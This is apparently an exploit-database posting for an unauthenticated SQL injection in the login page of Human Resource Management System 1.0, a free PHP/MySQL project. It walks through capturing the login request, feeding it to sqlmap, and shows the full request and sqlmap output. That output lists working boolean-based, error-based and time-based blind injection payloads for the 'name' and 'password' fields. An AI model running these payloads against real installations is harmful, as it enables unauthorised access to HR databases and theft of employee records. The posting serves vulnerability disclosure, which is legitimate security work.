Human Resource Management System 1.0 SQL Injection

`# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)  
# Date: 08-11-2022  
# Exploit Author: Matthijs van der Vaart (eMVee)  
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip  
# Version: 1.0 (Monday, October 10, 2022 - 13:37)  
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0  
  
1) Capture the login POST request with Burp Suite or OWASP ZAP  
  
2) Save the request as "login.req"  
  
3) Run sqlmap as follows: "sqlmap -r login.req"  
  
Example login.req  
  
==========  
  
POST /controller/login.php HTTP/1.1  
  
Host: target  
  
Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 66  
  
Origin: https://target  
  
Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php>  
  
Upgrade-Insecure-Requests: 1  
  
Sec-Fetch-Dest: document  
  
Sec-Fetch-Mode: navigate  
  
Sec-Fetch-Site: same-origin  
  
Sec-Fetch-User: ?1  
  
Te: trailers  
  
Connection: close  
  
name=admin%40gmail.com&password=password+&submit=Sign+In  
  
  
=========  
  
  
Output example SQL Injection unauthenticated login page  
  
  
==========  
  
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n  
  
sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:  
  
---  
  
Parameter: password (POST)  
  
Type: boolean-based blind  
  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
  
Payload: [email protected]&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In  
  
Type: error-based  
  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
  
Payload: [email protected]&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In  
  
Type: time-based blind  
  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
  
Payload: [email protected]&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In  
  
Parameter: name (POST)  
  
Type: boolean-based blind  
  
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause  
  
Payload: [email protected]' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In  
  
Type: error-based  
  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
  
Payload: [email protected]' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In  
  
Type: time-based blind  
  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
  
Payload: [email protected]' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In  
  
---  
  
there were multiple injection points, please select the one to use for following injections:  
  
[0] place: POST, parameter: name, type: Single quoted string (default)  
  
[1] place: POST, parameter: password, type: Single quoted string  
  
==========  
  
`